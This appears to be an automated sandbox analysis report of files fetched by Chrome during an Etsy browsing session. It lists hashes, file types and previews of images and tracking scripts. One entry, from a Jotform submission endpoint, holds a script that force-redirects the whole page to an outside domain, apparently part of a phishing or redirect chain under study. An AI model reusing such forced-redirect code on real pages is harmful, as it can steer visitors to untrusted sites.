                                                                                                                                                                              Preview:...... .... .........(... ...@..... ...... ...................d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d..................................................................................8....d...d...d...d...d...d...d...d...d...d...d..k...............................................................................Q....d...d...d...d...d...d...d...d...d...d...d...d...d...k..................k....k...d...d...d...d...d...d...k..Q...............k....d...d...d...d...d...d...d...d...d...d...d...d...d...d............
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):107199
                                                                                                                                                                              Entropy (8bit):7.976928638561535
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8A4A0DE9EFA26C5C3F79F0DC6964E4A7
                                                                                                                                                                              SHA1:433406E1D6F1803F7AFCAE8C407E75542D4B45C5
                                                                                                                                                                              SHA-256:E1E3E90519AFFA4E91FE028D7827BF448213E13FA7993DB3A69B5517C1A6A090
                                                                                                                                                                              SHA-512:EE5D49F9F4D22C5ACA1BAE6141FB1F01909F63F131158765E017A1E49609CC313E1185DAF5C1B7DAD78FDF81CBA3E3990BFEAFE0192ED9796E1C10F4AB5819E4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X..".........................................N.........................!..1AQ."a.q2B...#..R...$3br..C....%4s.Sc..&5DT..6FU................................;........................!1A.Qa."..2q.B..#R.....3br..CS...............?. T.........k.v.;~..8.E.......$....J^....ZV..k......`.w..s`....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):78144
                                                                                                                                                                              Entropy (8bit):7.969216162866804
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9973700389AF10B6075E6345293308DB
                                                                                                                                                                              SHA1:A45CD4FBDDD097A3F204DB294A5C1143DBE9A693
                                                                                                                                                                              SHA-256:C948945F1F0B163994025064AE9B5BA1779CBC9B1355417D2C148A07C3C1DC17
                                                                                                                                                                              SHA-512:2F03B4E026F6FB4BEE37343F549DEE80ED728E637B6604C1BAD4D5E816C7BBAF5B267A3DEF01BAAE6C2F968F7522A743D939DE057B5A3FC13B9A544E93026597
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X..".........................................J.......................!.1AQ.."a2q......#BR...b..3S...$Cr..c.4.%Ts......................................5......................!1..AQ.a..."2Rq..B....#3b.c..............?...L1.qw....k.`.a....[.<1?..`/..\..UW...x...c...-....[..{D...X.,.......A..9.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):59408
                                                                                                                                                                              Entropy (8bit):7.99325720603664
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E194970A7134080AD6F6CB2BB342AB12
                                                                                                                                                                              SHA1:D72AC24B956AFCB1EB7CDC949C22081C7B3B0BBF
                                                                                                                                                                              SHA-256:F22BBE11CDD4217E3C56816ECC98CBE5B9DD7A6C1D5B9298F29452E1179FC51F
                                                                                                                                                                              SHA-512:7BF998793B50976C62DE15810D55154A194FC726CCACB1C0B91D2DD547D0A0BD5D8CB3372B1EA9B1B15CFB1844353110EBE2E5F6D644A38DEE86D9185CDFC514
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/f13b7f/5489796656/iap_600x600.5489796656_hmuzl704.jpg?version=0
                                                                                                                                                                              Preview:RIFF....WEBPVP8X.... ...W..W..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .........*X.X.>U$.D#.!....8.D....Ish.........S.....>.7.O.........y.u..O......Y..~...{..q.K.s./..3.g.?.WC..?j?._L.5.B.........._.[.g...B.....^.........?..k...............o........o..+O......a...W.........Y.....|t.g.U.|.`.5"d.C..6..,.(..h...m.cK..^.v&...e..G;=.....7.og8O..P6V1..<;.x.#.....CY"...-....s.u...v.[,...|B3...S..;&.~...?.{.....p..k.~:.6%.2/g..0....).?>+.......u..qQ.T.L......RV2....r@...T.Y.6....D.Yk.....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):92668
                                                                                                                                                                              Entropy (8bit):7.982282018353581
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1E19F8247356309723E710992295F667
                                                                                                                                                                              SHA1:7C60132FBFA15DB5E7A48499F7A0F07D6782E82F
                                                                                                                                                                              SHA-256:6BAD4711C8B3F430B8E9306BFDEBAB98C6A4FA1CBC37F94F96E5AEDB9C79725A
                                                                                                                                                                              SHA-512:3083B261861F0A157B2F1323C7845AC9DB5DC0689E9C64B6AC39174F9CFCB84B0CF1A4EDD47B981520A5296AFE8D5706BEED80922953D8810C051122A5F3E7D5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................S........................!..1."AQa.q..#2.....Bcr..$%35CRbdst...&46S.D.....Te..FU.................................A.........................!1AQq.."2a.Br...R..#3Cb....S$4s...%D..............?........[.%..)^.m.S....5...q._..2~.I....&/LT7.._.Byjr}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):138
                                                                                                                                                                              Entropy (8bit):4.69095323525141
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:EA99A3F26D55C305324194DB0F6D0E8B
                                                                                                                                                                              SHA1:C8A5FE7BFA71BA9D11C0B3791244ADBDC1575466
                                                                                                                                                                              SHA-256:306A6B703FD5986A38832945683B4BA5D801530771C6EF95B87B6BF50EE69330
                                                                                                                                                                              SHA-512:1457DC7C999598BB401B201DC4F1347B0A372D6F868A4B1ABBA8379D0161D03BC77EFC82BE7560BF2037FF1D58D6793319CB4D10035DF324ADF1E4F1D64DD5B6
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://submit.jotform.com/server.php
                                                                                                                                                                              Preview:<script>try { top.location.href = 'https://criamaker.com/KA'; } catch (e) { window.location.href = 'https://criamaker.com/KA'; };</script>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (565), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):565
                                                                                                                                                                              Entropy (8bit):5.013395369899308
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:433CBAC690542626F503B4269A8DA12A
                                                                                                                                                                              SHA1:3E810BC4ABACCF42AC5E4B0B939D63C03711BBD9
                                                                                                                                                                              SHA-256:F83B1A3EA61AD62E47FAD82DE5495A2547E2F12E591AD8108050538C566AE1E3
                                                                                                                                                                              SHA-512:569B3D704F2A979D16624064ABD3B97F38EEA3C9A5F3F09D31C9B83D62C360717F6F66EE44A6B53686760421A57D7EB4ABD54904556B105B05AA81D5850F34B9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://ct.pinterest.com/ct.html
                                                                                                                                                                              Preview:<!DOCTYPE html><html lang="en"><head><title>Pinterest ct</title></head><body><div id="root"></div><script>window.addEventListener("message", (event) => {if (event.origin != "https://www.pinterest.com") {return;}try {if (event.data.key == "_epik_localstore") {window.localStorage.setItem(event.data.key, event.data.value);}} catch (error) {}}, false);window.addEventListener("load", (event) => {try {window.parent.postMessage({ key: "_epik_localstore", value: window.localStorage.getItem("_epik_localstore") }, "*")} catch (error) {}}, false);</script></body></html>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):21369
                                                                                                                                                                              Entropy (8bit):7.938172926998056
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C1964881F783964A9CF72BACE5364047
                                                                                                                                                                              SHA1:F6C6F8427FF63FF662CF813A1AC50CAD384E2FCB
                                                                                                                                                                              SHA-256:6959D231C878ABFFD2FA95E1078CACAF994C8C62E49E80F27D9FB3209E8BC10C
                                                                                                                                                                              SHA-512:BA0F3A7B0AFFFD7DE9EF37A00F34DF9C8B62F7E13B5798A3875CFC49E637F89A858B7F9D4E5D792B9B5F76E242CAF2D9342790727EAE166BCE5D3EB98E708758
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd........T..".........................................S..........................!1.."AQaq..2r...#BCR...b......$%3ESTs..&46eu.......5Dct................................>.........................!1.AQ."2aq....3BR...#br...C....%S..............?..v.S.Q.9.b.1.N.G..}..7...%F.,.h...OW....VO...g......]k.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):23683
                                                                                                                                                                              Entropy (8bit):7.828850834854859
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D46B820DCDFA95CB958E95153FE19174
                                                                                                                                                                              SHA1:3F178CA6F9E85D8FA6CDED28D5B1BE9CD3DC127D
                                                                                                                                                                              SHA-256:2D225B65F3A241333DC6EB6924A5FD51EE9C1570183F61C8099D58350898DEF9
                                                                                                                                                                              SHA-512:D567B82266872C45776DEA2CE11DCD5CA68F4B2FD3EF46E5955F3ABB599CAA9815EEE2041681C4BDA0BFD14B1C661431D022D903BAD960DF765F8E4111545688
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X.."........................................<........................!.1AQa.."q.2..B...#R....3br...$4C.................................3.......................!1.AQ.a.."q..2.#B..R.$3r..............?....(..M.,PA4...(..D.@.hP%..H..@......d...D...}...`..I .....@.........$....@PC......Z.h..A .*.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):11752
                                                                                                                                                                              Entropy (8bit):4.265410050682521
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8B898D745A5FBAA85495DD266FF215E7
                                                                                                                                                                              SHA1:72BD07A64E0BC3F9386D3F9D481154E70A3E4567
                                                                                                                                                                              SHA-256:E861B576D414F9F4A951F45A15A0AD5949AEFE0380229BA2B7C04877FF068DC8
                                                                                                                                                                              SHA-512:E536C9D921C00A2B996F26FDA3E9ACAD020BD999CDCAC1911489FAB561CCE57E9469B1BD0D26445769790C79719BB52647D5F7237E62F667965C8D06BC22651E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:(function () {. var ddOriginalReferrer = document.referrer;. var ddReferrerHashes = [. 'D013AA612AB2224D03B2318D0F5B19',. 'FD2A67F1C09ED58A5B136A11EDDA8B',. '77DC0FFBAA0B77570F6B414F8E5BDB',. '5D768A5D53EF4D2F5899708C392EAC',. '13C44BAB4C9D728BBD66E2A9F0233C',. '60D428DD4BC75DF55D205B3DBE4AFF',. ];. var ddFpHashes = ['C992DCAFEE25FA95C6492C61EB3328'];.. try {. if (!ddOriginalReferrer && dd.rr) {. ddOriginalReferrer = decodeURIComponent(dd.rr);. }. } catch (_) {. /* Silent failure if decodeURIComponent throws */. }.. /**. * Saves actual referrer to session storage. * @return {void}. */. function saveReferrer() {. try {. window.sessionStorage.setItem('ddOriginalReferrer', ddOriginalReferrer);. } catch (error) {. // Silently fails. }. }. saveReferrer();. var noScriptMessageElement = document.getElementById('cmsg');. var noS
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):87339
                                                                                                                                                                              Entropy (8bit):7.974003552089428
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:B4E7A305AD17D29694937CE9BFACC9A9
                                                                                                                                                                              SHA1:DFFAAD85011FC99DCE6C0CB4C46EBF058A9780A4
                                                                                                                                                                              SHA-256:D9AA55F8FF099A046A685ABBA787059C9680715F9C4EC52213B720FA16012462
                                                                                                                                                                              SHA-512:94F76E003F8E4972E4BF11002D609B90E1BA094E3DB9648EF50F866E39B086045F55AC0DFAF5CDCE45469C340FB49294A7710845D03B30C8A449FD37D8CEF736
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................J.........................!.1A.Q."aq.2..#B..Rb.....$3r.S...4CD.&c....%5E..................................;........................!1.A."Qaq.2.#B.3br...R..$4CS..D..............?..z7M][^..{s2..4~.Fs.V...:.u.v.Ic0...M6.....m....o..~..F....C...'
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 75x75, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3080
                                                                                                                                                                              Entropy (8bit):7.431726503031011
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5529F6A0E68130F9CC811BAC2B53FAA6
                                                                                                                                                                              SHA1:644DF296B03B26C164181F3655768860E9A7F856
                                                                                                                                                                              SHA-256:AA1A5282BB8BBCCE129386C2F73E2A638D1A9A02824675B266270586476BCE32
                                                                                                                                                                              SHA-512:FD87EF1110439CA4F188EC16E22C9F5429E743E18FBF75A612824B8F635659BACC179DACCBCF0E9F98284A2360E81A1B0ABA426DCD63D72DE33BD12986C6180A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......K.K..".........................................7.........................!..1A."Qaq..#B...2Rr..%b...................................*........................!Q.1.ABa.."3qRb.............?.+..<.hv...[2mW(.y..m...G.Tw.8.o...J.p...%..A...>.c..S..<:..#t[V.~[!y..\..g.sh..)..e.1.:.0}...k.B.V
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 50x50, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2334
                                                                                                                                                                              Entropy (8bit):7.160879929697606
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:01DD7BC0E5F4E104ECAEEC382F5B06EF
                                                                                                                                                                              SHA1:2D613C90ABCC0CEFA9C0EA2C1290BF21A52D9527
                                                                                                                                                                              SHA-256:AEF12B58220CBB2B1EEC3920F30CFF554665983F9023F86E42BD08847F882D84
                                                                                                                                                                              SHA-512:0331A94FFDD6AE5160B02E1C7424E75E2691F269CCA4410C1420C9240F153C5F0D0EA36B7618F6A173B25D76D195FBCA494063C4ADC0470DED898B252A8D82E8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......2.2..".....................................2.........................!..1"AQ#a..B...$2Rbq................................../........................!1."AQ.#a..RS....2q..............?.....T_n".Y..#..B..l.>y..gH...r.q.32...D.5.`$.....t.....j.X*."..U....8#i......K4T...O..>..4..T..Q.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (11390), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):11390
                                                                                                                                                                              Entropy (8bit):5.561078265745939
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:01B87F309621A34E7D604538FCB0E73E
                                                                                                                                                                              SHA1:81C15260340E6C94DF75B4D30CA13AD151F56DAD
                                                                                                                                                                              SHA-256:4CE65A5C6A90D5939700D3FEAD1A49DF247AA200D96485E4DCB4851C85C40297
                                                                                                                                                                              SHA-512:4ECE35C5C536CCCCFE3771470156578699FBEA4249EF843EEE2F428528406B08A9802DC023264E29D9A5CD3A314306DCEE77935FBDC569AF74C0A05D22659B87
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://td.doubleclick.net/td/rul/995917074?random=1729505296371&cv=11&fst=1729505296371&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v883287104z86935543za201zb6935543&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101836706&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F&ref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue&hn=www.googleadservices.com&frm=0&tiba=Felt%20decor%20-%20Etsy&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ecomm_prodid%3D736202387%2C1610452380%2C1794576675%3Becomm_pagetype%3Dsearchresults%3Becomm_totalvalue%3D%3Becomm_rec_prodid%3D%3Becomm_category%3D%3Becomm_pvalue%3D%3Becomm_quantity%3D%3Ba%3D%3Bg%3D%3Bhasaccount%3Dfalse%3Bcqs%3D%3Brp%3D%3Bly%3D%3Bhs%3D%3B_google_crm_id%3D%3Bads_data_redaction%3Dfalse
                                                                                                                                                                              Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":46656000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s2084024919.1729505276","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s2084024919.1729505276\u0026ig_key=1sNHMyMDg0MDI0OTE5LjE3Mjk1MDUyNzY!2sad4SEg!3sAAptDV4fJ2ac\u0026tag_eid=95328102","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1sZQASTg!2sad4SEg!3sAAptDV4fJ2ac"],"userBiddingSignals":[["8023594364"],null,1729505298706659],"ads":[{"renderUrl":"https://tdsf.doubleclick.net/td/adfetch/gda?adg_id=16623847170
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):33542
                                                                                                                                                                              Entropy (8bit):7.992910068135397
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:55DF2C78D251422EA0C73FBB3E384B76
                                                                                                                                                                              SHA1:8972FFDFACFF0A6929BB81A8CB85ECC1F55C5EA8
                                                                                                                                                                              SHA-256:6EDF1EC0054028CF5F7181ED031481500F99619999E398973B7A220A3A84414E
                                                                                                                                                                              SHA-512:34781ADE5437CC4CF256BE6531FCA73DA6ECD25484720565BA32B5FA816A56C77A2BB71DEFE656207C9DA18974975195FB5105ED4341A06138CB2A15E830992E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/25837545/c/2000/2000/0/0/il/bed897/5564414328/il_600x600.5564414328_tu7i.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2..Dh.a..P.;%Vt.h.|.h......}[..Xoi.....r.2......`....C.>?.}..X....UH..1.'.E.h,.44..........?..L...'.....~.u....\n.U..|}.~&.Hi...........V.aL......0..kr..a......6L*....,..s....Z.bh.W.7.i.9.gp...T...UP..{....&...'......J..UzixP...F.....X..cD!.*..*r...o.t..P.t6.......*..QZ.....)-).0e.h.&.F.{Q..FZ)A&..m23.....R.s$......_..D<....aE.~.#..{.?'c.nV.=.A.[..{..(.R.z.........ZK.L...9.q....<..;.hK4..a....L.A.......B..MX.c_&..@}.....0u.u.B.so.....Z.%.....,RP.p(.z..G.[.L.b.`...<*.|..S..4...;.;y.A?;c.t...N;n........m..38etk...O.P~..64.v..2...'6....P.0.(>.............A;Q.......<.X.....@.Dn.P6...&.FD.E^lK.R..'.g2=...o.....nU.E.X...>_../.30.>.. .2&....iFJ.k..bt..|.J.tu.%..%^6......
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65391)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):407992
                                                                                                                                                                              Entropy (8bit):5.5530673282292575
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:49055F85C863AEAC049A84D13240728C
                                                                                                                                                                              SHA1:7E07862EDD06B01123282CCE635D9A5DD4ABAD45
                                                                                                                                                                              SHA-256:FC2117CDD9B5C7149C6CBCA7B9AF3E65A4B584D3CF50B60C9C414C8620FDD51A
                                                                                                                                                                              SHA-512:1976D68E74BAF8F6220ACB2D04D7D11BBF112CAC5AE9F4A1984C54E927D4F2E1AABF6B9AB8E358C66B121C225830D3E68D10CE2FD1D1970ADF3626AED5DAA7CF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/ac/evergreenVendor/js/en-US/app-shell/globals/index.3109cc878e2735b5d361.js
